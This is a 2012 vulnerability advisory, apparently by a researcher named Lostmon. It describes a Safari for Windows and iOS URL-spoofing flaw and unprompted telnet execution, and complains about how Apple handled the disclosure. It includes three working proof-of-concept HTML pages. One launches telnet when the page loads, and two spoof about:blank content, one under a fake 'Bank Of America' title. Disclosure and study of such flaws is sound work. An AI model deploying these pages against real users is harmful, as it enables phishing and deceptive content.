##################################### Safari for windows and Ios Url Spoof Vendor URL: http://www.apple.com Advisore:http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html Vendor notify: YES PoC available: YES ##################################### ############# History ############# Yesterday i read a New about safari for IOS Url spoof vulnerability at http://iclarified.com/entry/comments.php?enid=20858 I want to clarify that i had report this vulnerabiliy in 12/03/2011 to apple product security across MSVR. (i had the mails that demostrate it) So apple Don't patch it and this vuln is one year old. I had report to a telnet automatic execution in safari for windows... andthey have patch in silence... no credits no info... THis is the response about telnet execution from apple: " Issue 1: We do not see any security implications with allowing telnet connections. There is an existing enhancement request for OS X to provide a warning dialog." Yes but not in windows and if you doing apps for windows you can't say it does not work in OS X. It works in Safari for windows prior to 5.1.4 Issue 2: URL Spoof I have found few times a go a RCE in IE 6, 7 and 8 see MS011-57 also it affects to Qtweb browser and safari for windows i report it to apple and sit quiet and wait till apple patch. So whats happened?¿ after a year of report he vuln continue working and other researchers had publish it ( http://majorsecurity.net ) but i like to clarify that i report it to apple one year a go !!! Response from apple: "Issue 2: The outside third party you are coordinating with already sent this issue to us on January 10, 2011. It does not appear possible to spoof arbitrary URLs in the address bar (i.e. while the title may say "Bank of America" in the proof-of-concept, you can't spoof the address bar to read https://bankofamerica.com) Given that the most serious impact of this issue is that you can prevent the userfrom using the address bar in the newly created tab, we do not have a timetabletoresolve this issue." look his PoC / exploit and look my code PoC His code => http://majorsecurity.net/html5/ios51-demo.html My code => http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html this is the similar code that i had report to apple. Bad Words for apple on security !!!!!!!!!!! and bad work with security researchers :/ ################ Sample codes ################ ############ BOF Safari.html ################# <html><title>Safari unauth telnet execution by lostmon</title> <script type="text/javascript" language="javascript"> function redirect() { location.replace("telnet:192.168.1.1"); } </script> <body onLoad="redirect();"> </body> </html> ############### EOF ################ 2- URL Spoof or about:blank spoof This issue can use to spoof url locations or to show fake content in without any URL in the address bar - open the PoC and click in Invoke PoC and look at the address bar, it does not show any url....(safari2.html) -open the PoC and click in invokePoC (safari3.html) Look at addressbar it shows "about:blank" but itn't at about:blank. and look at the page title :) This can use to spoof content. ############## BOF safari2.html ################# <html> <head> <title>About:blank Url spoofing using document.open() testcase</title> <script type="text/javascript"><!-- var wx; function invokePoC() { wx = open("","newwin"); setInterval("doit()",1); } function doit() { wx.document.open(); wx.document.write('OWNED OWNED OWNED'); } // --> </script> </head> <body> <h1>About:blank Url spoofing using document.open() testcase</h1> <noscript><p>this testcase requires JavaScript to run.</p></noscript> <p><a href="javascript:invokePoC();">invoke PoC</a></p> </body> </html> ################# EOF ################################ #################### BOF safari3.html ################### <html> <head> <title>About:blank Url spoofing using document.open() testcase</title> <script type="text/javascript"><!-- var wx; function invokePoC() { wx = open("about:blank","newwin"); setInterval("doit()",1); } function doit() { wx.document.open(); wx.document.write('<html><title>Bank Of America</title>OWNED OWNED OWNED<br></html>'); } // --> </script> </head> <body> <h1>About:blank Url spoofing using document.open() testcase</h1> <noscript><p>this testcase requires JavaScript to run.</p></noscript> <p><a href="javascript:invokePoC();">invoke PoC</a></p> </body> </html> ##################### EOF ############################## I would like to thnx MSVR for his preocupation on this issue and for talk about it with apple. MSVR is a Very Good program and they do A VERY GOOD WORK on security !!!!! -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....